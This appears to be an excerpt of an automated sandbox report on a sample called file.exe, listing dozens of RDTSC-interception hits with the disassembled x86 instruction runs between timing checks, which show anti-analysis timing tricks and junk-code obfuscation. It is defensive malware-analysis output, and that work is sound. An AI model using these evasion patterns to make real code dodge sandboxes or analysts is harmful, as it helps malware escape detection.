              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAB5D0 second address: AAB5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FB10CD32102h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAB5EB second address: AAB62C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE4292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b jnl 00007FB10CBE429Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FB10CBE4286h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAB62C second address: AAB630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAF63B second address: AAF641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB600F second address: AB6044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push ebx 0x00000009 jmp 00007FB10CD32101h 0x0000000e pop ebx 0x0000000f pushad 0x00000010 jmp 00007FB10CD32105h 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB640A second address: AB6410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB6410 second address: AB6433 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB10CD32109h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB6433 second address: AB6439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB670C second address: AB671E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FB10CD320F6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A79D00 second address: A79D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB6A1E second address: AB6A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CD320FDh 0x00000009 pop edx 0x0000000a jmp 00007FB10CD320FEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB6A42 second address: AB6A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB6A48 second address: AB6A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB6A4C second address: AB6A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB10CBE4292h 0x0000000e jmp 00007FB10CBE428Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB6A73 second address: AB6A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB78F5 second address: AB78F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB78F9 second address: AB7926 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB10CD320F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB10CD320FBh 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jmp 00007FB10CD32100h 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB7926 second address: AB7930 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB10CBE428Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB79AA second address: AB79B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB79B1 second address: AB79B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB804A second address: AB804F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB804F second address: AB807A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB10CBE4291h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB10CBE4291h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB8ACC second address: AB8AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB8AD2 second address: AB8AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB8AD6 second address: AB8B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sbb edi, 7643F981h 0x0000000f mov esi, dword ptr [ebp+122D17AEh] 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 jmp 00007FB10CD32107h 0x0000001c push edx 0x0000001d jo 00007FB10CD320F6h 0x00000023 pop edx 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB8FDE second address: AB8FFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB10CBE4294h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB8FFC second address: AB9006 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB10CD320FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB9006 second address: AB906B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 or edi, 6C75E400h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FB10CBE4288h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007FB10CBE4288h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D1AE4h], edx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jns 00007FB10CBE4288h 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB906B second address: AB9071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB9071 second address: AB9075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB9A4A second address: AB9A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB9A4F second address: AB9A54 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABA33B second address: ABA33F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABA33F second address: ABA348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABB5A3 second address: ABB5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABB5A7 second address: ABB5AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABB5AD second address: ABB617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007FB10CD320F6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FB10CD32105h 0x00000013 jnl 00007FB10CD320F8h 0x00000019 popad 0x0000001a nop 0x0000001b cmc 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FB10CD320F8h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 mov dword ptr [ebp+122D1AE4h], ebx 0x0000003e push 00000000h 0x00000040 sub edi, dword ptr [ebp+122D2A08h] 0x00000046 mov si, F900h 0x0000004a xchg eax, ebx 0x0000004b pushad 0x0000004c pushad 0x0000004d push esi 0x0000004e pop esi 0x0000004f push edx 0x00000050 pop edx 0x00000051 popad 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABB617 second address: ABB633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FB10CBE4293h 0x0000000f jmp 00007FB10CBE428Dh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABCA6F second address: ABCA74 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABD527 second address: ABD52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABD52D second address: ABD54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FB10CD320F8h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FB10CD320FCh 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABD54E second address: ABD554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABD554 second address: ABD558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABE018 second address: ABE046 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB10CBE4288h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FB10CBE429Fh 0x00000015 jmp 00007FB10CBE4299h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC1437 second address: AC143B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC143B second address: AC1441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC5A5C second address: AC5A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FB10CD320F6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC5A6A second address: AC5A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABDDCB second address: ABDDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB10CD320F6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FB10CD32100h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABDDEC second address: ABDE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB10CBE4298h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7FBB second address: AC7FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7FC1 second address: AC8020 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB10CBE4286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FB10CBE4288h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov di, cx 0x0000002c push 00000000h 0x0000002e jmp 00007FB10CBE4299h 0x00000033 push 00000000h 0x00000035 xor bl, FFFFFFA0h 0x00000038 xchg eax, esi 0x00000039 jp 00007FB10CBE428Eh 0x0000003f push esi 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9024 second address: AC902A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC902A second address: AC902E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC902E second address: AC909F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b jmp 00007FB10CD32100h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop esi 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FB10CD320F8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f adc edi, 0C567EFFh 0x00000035 push 00000000h 0x00000037 mov ebx, dword ptr [ebp+122D2708h] 0x0000003d push 00000000h 0x0000003f js 00007FB10CD320FCh 0x00000045 mov edi, dword ptr [ebp+124497D2h] 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FB10CD32102h 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB3D3 second address: ACB3DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC1AAC second address: AC1AB1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC451 second address: ACC457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC61B1 second address: AC61C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CD320FAh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7190 second address: AC7195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7195 second address: AC71A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC71A4 second address: AC71A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC724F second address: AC7255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE471 second address: ACE486 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FB10CBE4286h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE486 second address: ACE4A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE4A0 second address: ACE4EC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB10CBE4288h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D389Eh], esi 0x00000011 push 00000000h 0x00000013 sbb bx, DB3Ch 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FB10CBE4288h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 add dword ptr [ebp+122D1BA5h], eax 0x0000003a mov edi, 261DD6B1h 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE4EC second address: ACE4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC820F second address: AC8216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD0496 second address: AD04EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 adc edi, 0D23031Ch 0x0000000f push 00000000h 0x00000011 jno 00007FB10CD320FBh 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007FB10CD320F8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 and bh, FFFFFFF5h 0x00000036 xchg eax, esi 0x00000037 jp 00007FB10CD320FEh 0x0000003d jnp 00007FB10CD320F8h 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 jg 00007FB10CD320F8h 0x0000004c push ecx 0x0000004d pop ecx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD04EE second address: AD04F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FB10CBE4286h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9259 second address: AC925D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC925D second address: AC931F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB10CBE4297h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FB10CBE4288h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D3546h], esi 0x0000002f push dword ptr fs:[00000000h] 0x00000036 pushad 0x00000037 cld 0x00000038 sub dword ptr [ebp+122D2FB1h], ecx 0x0000003e popad 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 mov ebx, 1BC886A9h 0x0000004b mov eax, dword ptr [ebp+122D0205h] 0x00000051 call 00007FB10CBE4290h 0x00000056 mov bx, 51C1h 0x0000005a pop ebx 0x0000005b push FFFFFFFFh 0x0000005d mov bx, di 0x00000060 call 00007FB10CBE4293h 0x00000065 jmp 00007FB10CBE4298h 0x0000006a pop ebx 0x0000006b nop 0x0000006c pushad 0x0000006d push esi 0x0000006e je 00007FB10CBE4286h 0x00000074 pop esi 0x00000075 push eax 0x00000076 push edx 0x00000077 jc 00007FB10CBE4286h 0x0000007d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD1321 second address: AD134D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB10CD320FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FB10CD32107h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA3E2 second address: ACA3F5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB10CBE4288h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA3F5 second address: ACA4A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov di, 6D08h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov edi, dword ptr [ebp+122D27E8h] 0x0000001b movsx edi, si 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 or edi, dword ptr [ebp+122D2FE2h] 0x0000002b mov edi, 72637CC0h 0x00000030 mov eax, dword ptr [ebp+122D11E1h] 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007FB10CD320F8h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 add bx, F4C6h 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push ebp 0x0000005a call 00007FB10CD320F8h 0x0000005f pop ebp 0x00000060 mov dword ptr [esp+04h], ebp 0x00000064 add dword ptr [esp+04h], 00000018h 0x0000006c inc ebp 0x0000006d push ebp 0x0000006e ret 0x0000006f pop ebp 0x00000070 ret 0x00000071 jmp 00007FB10CD320FFh 0x00000076 stc 0x00000077 jng 00007FB10CD320F9h 0x0000007d push edx 0x0000007e stc 0x0000007f pop edi 0x00000080 nop 0x00000081 pushad 0x00000082 push eax 0x00000083 push edx 0x00000084 jne 00007FB10CD320F6h 0x0000008a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA4A3 second address: ACA4B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FB10CBE4286h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2340 second address: AD234C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
